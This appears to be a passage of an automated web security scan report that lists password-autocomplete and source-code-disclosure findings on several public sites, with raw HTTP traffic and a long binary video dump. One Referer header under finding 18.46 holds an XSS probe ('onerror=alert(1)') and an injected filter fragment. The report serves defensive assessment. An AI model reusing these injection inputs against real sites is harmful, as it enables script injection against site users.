<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.42. http://www.polls.newsvine.com/_nv/cms/info/jobs previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/jobs

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/info/jobs HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 22585
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.43. http://www.polls.newsvine.com/_nv/cms/info/privacyPolicy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/privacyPolicy

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/info/privacyPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:53 GMT
Content-Length: 32656
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.44. http://www.polls.newsvine.com/_nv/cms/info/userAgreement previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/userAgreement

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/info/userAgreement HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

18.45. http://www.polls.newsvine.com/_nv/cms/welcome previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/welcome

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/welcome HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:32 GMT
Content-Length: 16514
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.46. http://www.polls.newsvine.com/_vine/a previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/a

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_vine/a HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre35aee%3Cimg%20src%3da%20onerror%3dalert(1)%3E16f5f70bd5e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

18.47. http://www.polls.newsvine.com/_vine/js/m1/vine.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/js/m1/vine.js

Issue detail

The page contains a form with the following action URL:

http://www.polls.newsvine.com/_vine/js/m1/vine.js?v=23247

The form contains the following password field with autocomplete enabled:

password

Request

Response

18.48. http://www.scientificamerican.com/blog/observations/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The page contains a form with the following action URL:

http://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser

The form contains the following password field with autocomplete enabled:

password

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.49. http://www.scientificamerican.com/errors/404.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/errors/404.cfm

Issue detail

The page contains a form with the following action URL:

https://www.scientificamerican.com/view/utils/overlays.cfc?WSDL&method=loginUser

The form contains the following password field with autocomplete enabled:

password

Request

Response

18.50. http://www.six-telekurs.com/tkfich_index/tkfich_home.htm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.six-telekurs.com
Path:	/tkfich_index/tkfich_home.htm

Issue detail

The page contains a form with the following action URL:

http://www.six-telekurs.com/tkfich_index/tkfich_home.htm

The form contains the following password field with autocomplete enabled:

password

Request

GET /tkfich_index/tkfich_home.htm HTTP/1.1
Host: www.six-telekurs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page contains a form with the following action URL:

http://circle.stylemepretty.com/wp-login.php

The form contains the following password field with autocomplete enabled:

Request

Response

18.52. http://www.unmannedspaceflight.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.unmannedspaceflight.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.unmannedspaceflight.com/index.php?s=fca5e4b9dbd2693a2f3fe33702719089&act=Login&CODE=01&CookieDate=1

The form contains the following password field with autocomplete enabled:

PassWord

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:13:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/5.2.5
Set-Cookie: session_id=fca5e4b9dbd2693a2f3fe33702719089; path=/; httponly
Connection: close
Content-Type: text/html
Content-Length: 87175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<td align="right" valign="middle">

           <form action="http://www.unmannedspaceflight.com/index.php?s=fca5e4b9dbd2693a2f3fe33702719089&act=Login&CODE=01&CookieDate=1" method="post">
               <input type="text" size="20" name="UserName" onfocus="focus_username(this)" value="User Name" />
               <input type="password" size="20" name="PassWord" onfocus="focus_password(this)" value="------" />
               <input class="button" type="image" src="style_images/ip.boardpr/login-button.gif" />
...[SNIP]...

18.53. http://www.unmannedspaceflight.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.unmannedspaceflight.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.unmannedspaceflight.com/index.php?s=47217f8154e2e2ad81f66ad14c4bf133&act=Login&CODE=01&CookieDate=1

The form contains the following password field with autocomplete enabled:

PassWord

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.54. http://www.zacks.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.zacks.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.zacks.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19. Source code disclosure previous next
There are 5 instances of this issue:

http://fitbie.redacted/
http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv
http://platform.linkedin.com/js/anonymousFramework
http://sstatic.net/Js/wmd.js
http://sstatic.net/js/master.min.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

19.1. http://fitbie.redacted/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://fitbie.redacted
Path:	/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: fitbie.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sat, 29 Jan 2011 15:01:40 +0000
ETag: "1296313300-1"
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:17 GMT
Date: Sat, 29 Jan 2011 23:46:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div class="panel-wrap-top clear-block">
<?php// print_r($content);?>
<div class="panel-panel panel-top-left">
...[SNIP]...

19.2. http://oneightyla.vo.llnwd.net/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://oneightyla.vo.llnwd.net
Path:	/o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /o37/live/sony/2010_11_04_BLOGGIE/video/TubeFailWin-160x90.flv HTTP/1.1
Host: oneightyla.vo.llnwd.net
Proxy-Connection: keep-alive
Referer: http://ec.redcated/ds/UXULASONYSEL/BloggieHoliday_HD_PC/Flash_300x250_HD_PC_promo.swf?ver=1&clickTag1=http://clk.redcated/go/296652509/direct;ai.200329627;ct.1/01&clickTag=http://clk.redcated/go/296652509/direct;ai.200329627;ct.1/01
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 521037
X-Permitted-Cross-Domain-Policies: all
Content-Type: text/plain
Age: 112773
Date: Sun, 30 Jan 2011 01:19:49 GMT
Last-Modified: Mon, 22 Nov 2010 09:25:05 GMT
Connection: keep-alive

FLV.....    .................
onMetaData....
..duration.@,.E......width.@d........height.@V.......videodatarate.@i.......    framerate.@=.S......videocodecid.@........audiodatarate.@P.......
audiodelay.?...S.....audiocodecid.@.........canSeekToEnd....    .......l.........    onXMPData.......liveXML..L<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...

<?xpacket end="w"?>...    ...w..............P...    =#=......pw.......*.B.1..l-.c....X..<...#...B5N..w.9    W.Bz2...E.....R.............e.....[v..$.SI&.m6..H-.d8..1s@9p.9.x&1$..?...t].....wk{S.........&I,I..$.v(<...Y(.H\....@..
...[SNIP]...
<..S0.m...g.......q.oU.%7H....+.$Byu...X...'.p.<?.9.I..A.L..V.....^v0z.W..Z.az.4.
...1...;H]...........h......z....Q..Z.d&....s.Q.z+..Ul9vv.-0.E..0..7.#.~.L.P.KL{z.e..C!...+?....z.Q...".p..5.#...-...7.....e....{..!=.......;.wL...>    ...x....%.;x.K`.jY.>    ..`1..S.sP.w.h...b...2.07-.A.......=i.>.c... ...................P.....;f..m...-$.u.Dg/Ja...&#.......Pl..J..."...s.b.);..Y......z..,...7L.+-R..[..+...w..
.&...B......E...../W....[/..r.E..#.#D ..4@...6.U;X.........&..6....8.6w./$.Z....:,"....ea8._e.3......1MB....EfY*2eiO..........
.......P......i'.kip.,..i@.:...X...V.ie.\.BS....d.Y.S.v..hQ....p...y..\.Fz.W..(.)....Q...I.t....S....    .6..;Q.......).Y(.C.7edjw.&*!.[!0.    ....j.G.
..*...L...$3(.....a..eV.....ef.3...[x"I9f....%.../j...Y...s52:......    ..~.......$..@....@....-.....J.@..0.yi..Yq.q4@V$I..&k.ZU...|...H.*.r...{T.V....7PY..m...+.L..9.s.....Z..6xx9$.(...V...(.....+~.Y..-_.e.J.0....5: .e..HZ..e..[..`.N.."k..}......M1...*.w...X.@...":.. R..Y.k......
..*.LOG&.<-.'...o.n....D^...s4.'..........npK..6m.~..?m..M<.
mZ.0    ...:....z....J......b....g..](r0]0F!....Cz5.dY...{.....q...i...R/tt...:j...aK.h.....z.....!z....A....#MWH...hF1....N..`...W...y!.-.:_.......(.&.~...d
.t..v..nG7.....f..R.\../...|...U..M....4)SZE@.....    ..Ie ...u.......L._...QGkA.C.
.~.r.w.?g......o.q....JU..9K.f[.....o|}.Y.`...x..\e....._4}W#......^.....).%S...e8.d...%......l.1D..A.3.........K#..V.:..F..)..X..Y)...@...........$.......P....L.k&$kin.md.m..w`.!.B..8.w...9.-.BD+.......O.R.D...*{...bAd=~......N...".0;......Q....(..23..n..:V...]...rm.....K.^..U.......0...dj...... .7..R..kj........g..VV....d...............E"A$.Zk\.......`........    ..o..0....$..@..0....&..N...QhL@Ns.@9?o9..a...*).3....,h.T,.>...-....s..#....8........7..5......2..AJ@|6..q....} .)n....([EH6...Glh.....GiMGz.#.P0...o-h.Y.:.......p..?.$j...G.....~q.q..+..kr.Qb...X.^.+.>g.|.y`..P..vO.9...-u^.c
...v..s........v....^....M..l....VXK/..K.....w..    .f....4...../.`..........<9...n.(..>...m..CE.....|..u..l...WQ.\...P.D.E.(.#.d...3..q4.z.s ..>R.q.>....*.$.......Kk+A..C.e.\"(~v.
..]_B$)...M)%Fa0.y~.m.h.......c..IGB5%..y...}.CkC.nn....&.b6....}NE..}.........3..i..N...g6..    .(
...x.M    +-.....-.P].....+...0.........X6.4....p.BI.=d.#.%W.+......Q}u..!.../.s2g...zW...........Ld...7Xt..b.\.;.....V......z......>.......P.....k'.k.p.,..u.hF.D.:..u.M.K.W.r.....]x.s..U...:c0$.P......l......)..UY...Rb>..R?.Nz..........n....@..j..._^....1..,.
Ww>..[cdh..r...La....1.<.2.8.=._.].%.{..eYiU....@.%..hj..@W. H.0.F......PAU.ua..GN:....    .....Q....$..@...o!r......&p75O.....a9.-....BbE.=.....S....k.P.L(O.....=a.........@<..n.B.J.d....B... R?.c.S....Qx[|:D3...E'..l...Uf.....w..5....K.I.=.....[..Kb~"......(.s$..)....U...g.........:7.I...8....8N......1..Z*.....=.?......9<..C.{.-..t...X@*c.....Z..r|9..V....8>@....G....c.$..=.q......,L"..j.O.5-E....C..>.W .I.x...n.e.    <=....WiM4i...$...L....f~.+..../ho...S..y$.@...0=...........%.\2.t$?.~..
.....P..5....S....E;{][pHr...g..X.~....mHv8Q.X..ms..r/-...u.A..?...7X.s.4k?gjX.......q.;mB.Fd..e..A&px..Od.3.K..r.M..a..^..W.g.. S...7N..x.R...aq.KZ.9d..!..........U!.W.../r.....W..........}..y.....{.}....|..2.>'......g.......1).....q.MufI..$..g.... ..s.........t....L-.D5%.h...U..*x].....k...j.V|...r]'.....#x..;1.fg...........:r&2.;=N....O_v.....i..............X.......P.....+i, m.n.,..m'V.o..Z.I.p....yT.|.92....O.....o,.    0h.i...t..R_.Qk..V........J.S....T..vL.
....?......^!Z.H..2.L.<].4...f..V..J.a...G...D.U...#..,....... eY.....Ql.eR.9Yb.}....    Ti.6U.F.SH?.g.o?.<..\.............r.......P......i&.k.p ....u.[.. .UT!@.C.0....q...D|d8.l0.....rCWpE......`...*..52..l.a6M.45F..;.....*...lb.gv/Z.(..&.T..5..5..9V6.P..b'...\...`..5..O&9...G.`.i..K........(..%+*..R..
....C.\.U|..6./d..M....{.s.......    .....s....$..@yB.)9.@.........$..#F.U......q....K..!B...dn..O..v'...aqq.g}..%u....k.S.~..,`......T.5..._^..jj-....WG..c.L.6....G....2..=lS.,.Z....^..o..*.Bw5.f@....'I........7...M..    .6...W..%3.%.C.9.'..5...I.,.....%~...8.....V...x...u........X..p...4..^....b9).WW.....6.oI..p`.....T....Y..4e..5...>&X...`2.C@o....=.v...Kr5c.Z..f.)OB..a..T...X.Y].+.z..o~.A.{.U..I.~8........L...a..$.........V....Y.....O.x.v.*...[CB.h..C...g..4w]....c.!.....1.DB..m......2..J$..J.M.t....9.S....f........x......L...EA...g...qb..<..y...w.1A[....Z..&._..W<v@E..,..X_..L........N.:..1}.....)N....G.Q.x.....'Z..p,...T..r...=.|:{k;....3...M.6.htC..m.e{-...v.M^......*..)\......u^........\.un......zg..a~t7..:...wyV...........=>[..[.Do8..&....9..*M[..);..;o..A...F.
.L...n.........'...........]4.f0..Z........................P....T.i'.k.p ...u..SG&..(.b.F.J..5m.)jG7?R.q.).......`..3...U.......m..3.MT.FFI ..h....#. .....8~..C,.2....6..Y.43W,.@A.I...z...Re[.Q!;U8.<..P...L1S.H>....*.........     -W....K....Cb.YeM...!.!f...z.s..,.r4....    ..........$..Z...k.I.t.y.$.XJ...&$.t{.b..K..<.....D........u)M:F...O..D..Q.D...r...uo..=.{DV....9...4g...p.Y.[X..:<...N..W.....x.I..|"0......wG.0k.......'y.RX.].u'Y,\.N.w.._.........n..UU.f>si.(.?E.%VL.}(;..2.!4.".WP.j..H.."A......5..\kJ....+L...s..b...g6{k?..W..    =...X..b.s...=.4....v5o..
.1...!..6....j...l...l.$..@.....;<.l".x.}..|.>
....M..R....w...n.l.W.V...,C.S....9..&"h.Ey...WA.zb&KSE...=Vup......I....^..]?...*..u.....c...q..l...!.Kj...Q.d.>....X.5........+..|...n.c..8..Z.....U%^t...l..4.3e/j...#V0..YM.....o.%0.......AX).+...d..5..._-ws.. w`...rX...(..}..B...bD..._k.)....,..J.....5#A.....w.L.7..c3.........6./1/..).a...9.yypQ{....JN3.^..ZI<..v..u.SX`p.]..1.....Y#....B..#..(P\..x@...................P....M)k'.m.}.-$.u.....u.fEP.=.....|.%..YD......K......
?a.S.... ..a..\ ..%j.....]J.Z&e....E.....C&M.d......uC3......N@....R3r..N".X.cJJ(..XT....<..&.....9Q.......(..E-*.....m...+...E..}4.0$....#1....j......    ..........$..@u..] ...."d.f...P.d.l.0.N.Q...I.6........sQLi..U...R3...w...[.x...5..:...xgU.4.N%...I...g
.......o...y....U...........|Y.p5t.q......7.....bj..[E\.....3..J.gMG>......6.....H....S.....&......./!4(b...Z...O./.....:..&bE..M.=.J.......q....I49SK.o6......Z<Yu..Y.F....^.k..x......1.Ve?O.......$..M....yy....Z....b.    @{/..9....!.|.......k/...%...'dc...rG..n=;*..e.G....c..].C.s.~Pq|.]..j.........u...k...3.....O.|.'.)...../e.C=.y....{j.&h..(.rC.lB..r..FS...j.{......w../.-.G....|O..6.....o....@D`....**...&.....<.d.....M...Z0.....w.....K.t...+...F.|J...V../.@`.......8..B.W.q.XnBlp...dV<..la...L.@.....`......H ..y....v.......S.#.gKwP]R.y.]E\.^.-...rg.,:.@N.g.K..5qt.e:.......... .G..YTf. ..?.d. .G....K1.....0.mA2....................P......k..k.t.....t..S...g.........fk-c.h.6dL...."}A.I.......C..=P............v.*.b..N...vC...r..V....v,Y%k..}....E..X......EZ/..HU.z.i..}b3.+.(T..nCV\.f.........)'.E52.t....~\...&M...N..2.Y......b+...cV....    ..J.......$....0....&pA.&.....iw. . .7W[]l..>]..aWkB......%...R@......)....A..7....p?..-QW.B...f./..W.0.......P0t0...x.*.....D........c.cA....! &....G......_..Hu.#.7.]2.x....)z.I...qE.<.H.Ds......c..B.............>dG..,.h.H..3......+u..l.x.<...<p....._.....J.(......*.P...q~..F...../...UZ|..H1.k.F....+.....n..]....)...F
..B.V.................!.#.2.....|F.C#....._...:...."Y.....).1...4...,.....f0.
ty\z..,{N..V..Qk......0..Q.~......U...a<#...VkK.>_.0.y...^5..C..u.$.....Q....x)//y.t&......%....i.5.{...Iv._hr.&u*.(S....p.....n.k.@..j..G...jx..~.o..4...YK...Xz-...4..|.....aC\E..V...2..D'.........U..............P......i..kIx m0.qu..0...c.(..j....g`....@4.&8[.nj.......k.......m>..@.Z...b#..Q...'4-..[.<.?...Vk=.Rd.4.4..FN....$.<.6F_.8e*b!........,.a#.../.*:D.$gv..|?...*,....Z@U.kA..^.9.C.e.4(...\...LR....q.A...4..................P......m..k.g..`.u=..fp..8[.2z.h..E..(...p......i,Pk).}..Y?..._p..*.ML..@B.9.....ul....:....&3m.....=...'..m>.rJ....O.jo......I.qO......].....K.X..nN.....e@VDTYE."D........2.^.V..u.Mx.......A....K...h.1.....    ..5.......$..[..V....a..!...........o-..*i?&.......7.l...1....5{..WH.`.>.p.......;..0,..P....v<....w7."...9....6)...;..i..+d...>75m.[...E.t.E@a....E..H......<>............k...~...}[~...~Q.9......H.K.J
......~3.}&..#.vak..L1+:"..    Tr.o.f..!*./R.{...3..nX...8,.V.@.M..8.I}8HV|........W...~i......{.......N2.`Y85..d........z..A.2.?...;.....1`.Y    .&L.Ic.F.zb.H+....K..|oV.(..Cr.._o..=2@....3.eS..X...I.;..`.m.8.Q)B.....lx.R......x.S.....~.*a.X..`...k..n.-.q..|...E..O..1m...;.R}?u....K+...|R..:r..BN.i..6.`.f........D!y..    ..{SM...L..._....kI4....J5...i..e*r=..H4.k.%...,y}.BF.....@..............P......m..ki...$.q8.a..d.S5.Dc0oY......o.. Y]...<....hq.A.P.;,.....5R........~.....u...;..7ejtv8p..........V.n.a...$.Y.....^i.S.l1<...w.......l...z(.>.H......\...TtW..a....?.*...U....ZN\".Kgr.cj...luK.....    ..<.......$..@.P.....,.....cf.%.$Y.."..C.ya..0...1!.?..`...Xd.N..T[......-.*.{HXIjy.!(.Tzb&.??Z    .+....4.V?.f.g...#.......R..E......G...,*i... ....W.......ST..K........L....8Co..o..ru...h.5[:5..-m..da.1.C..`.U...U...g.<*......i....E3`...~{`....WtG8......m`2Cz......`6n..{..${..j...8T..s.k1Q..oD..... ..+...YX.0dm.e.!..A@_wq.^.{..
.......Y    .....d.Btx)...g.K....../\m.    ..%&.B;..21.....V.:....opE......&.$.c>/.b....V...!.T....b.B.&d..7O.t....._t..i....C........s..?..\i.X.7..JF.!..6bs....d...\8)..v.8...kh.X.6X-$.^ B.1..........2.o/..m..[..OKB.E.@#./&.G.....F...m.>X.!..P)
Bj.......G......).......P...
..k..kif.m..m...nq..Phj..QG#....J.j.!.U...7.9\U.?..W.....N.iw..k:..........&..'..d(J..@...4$..[|...B..G4...a.8<.Z.....BSUEg........U.4..AG...u..0.......Tz?k...YiU.K.{....|r..b......U....'..Y....b...(....    ..l..;....$..Z..........V.9g.9V0.1.7    .J].!`.,i..D.a...*.C..L.E.,<...Q.F-Y........d...&$aZ;...-...3....u........qv.../...h......&.qA...i#.@.H....:y..&...a....uD.}.-.-.....(...H....m3.d.>.S5M..uT..di.8 ....D..B.s..d.^.E:MA_."D.$....?M.m.Z...jXf..Y........-Yu{...|i..{U.....2..]?.!.............O.hb./..x.....c...L....r.....m...vv.:..!.E...A.L'..a..{.O..;...j......q....2.....|....X.......h.......w...\,z.8......K1W8..~.../x....<.p.x..I.....dm.......L...[..c.[..
....y0.G......[.`......U..<.K.kB.a.c..E.e..:..'...J...A...U..bt.........h....g.+...eun..'.kK.7..    ../D3{y$$WF...8.@9...>......=jq...(j...p(..7...Er.....    V...H..Zz......w......C.......P.....+k'.m...m...u..L. ..*...
..1..).(.UF.......*..d".d..W.l^..3......f..ZeeC.A..5..8...o...D...#.*.O;Ux.[.B.<..~..7..E'.......S...o7u.~.N;.....Pb...4y....Z.....i....W...j....Q....,.....t.}..........+......    .....]....$....L@...>`...l.>....d...I......K%./A=eF..,.....J5..J...u...'i..8.!.2..y.    `......S.*6sAI..;..3(...5fe..J.3..I:h.b.    ..........W.O......._g@(o(....6-`.`..LdGy.&~.)..\.......uA'..<'..A..%gX...Ua.o1.lY...m.Jd.Z.[.....2..*....3....FA.t ..N..2, .z1..r..1~..dv.%AD.m}...
.]....jk...&\....fe.D......=c.@.I..4D.z..-.U.....r.^t........[...2#........xf.N..... ...R.. /.s.2..f...@;!..........&..>i.4..r....r...uf1%.......gj..?'..v.m.]...._.c.h.;....*.......i
.S..Ld......o.L,H...1r......2.......&._....E...$......+skL.j..Tq..RI.Kg....."@X....Y-h..........Hh...w+..1N..(me-r.o....}..+A.......K"y&....Q.a/....Va~3"..Q.."'];./c.!.'..B.I..R"..u.D..C.B......[X..M..;F.2.l.(*.ub..4.a.$&E..3-.l....b.:.....c9...B...n..V.......L.[o.h................^.......P...
..i..ki.........!....k...f.-.-BDiHX..JQ.W..Q.=.....<...}....bo_F...%.eZeb....B........%0....&..5|_.y....._.9.Nq.Z./..../i..Tu4.(.oe......1..p..;~r.......K.[..nY.t5.f..iUM....3.e]*...D
++..o.]cS].g.............x.......P......e'.k.}.m0..mSk.A;Xn..%......>q...K..    ..z;..)0.N;..L\..X...+.aA.._...._U@..;.KD...B.u.....B..fF.u.....i.-.%X....AY...M...D.(.f.....a...6BTcSa.T..,..................XYEO2...|..J.B...P.J&j+......&n...m....    ..Y..~....$..[......C*tf.|}..h..
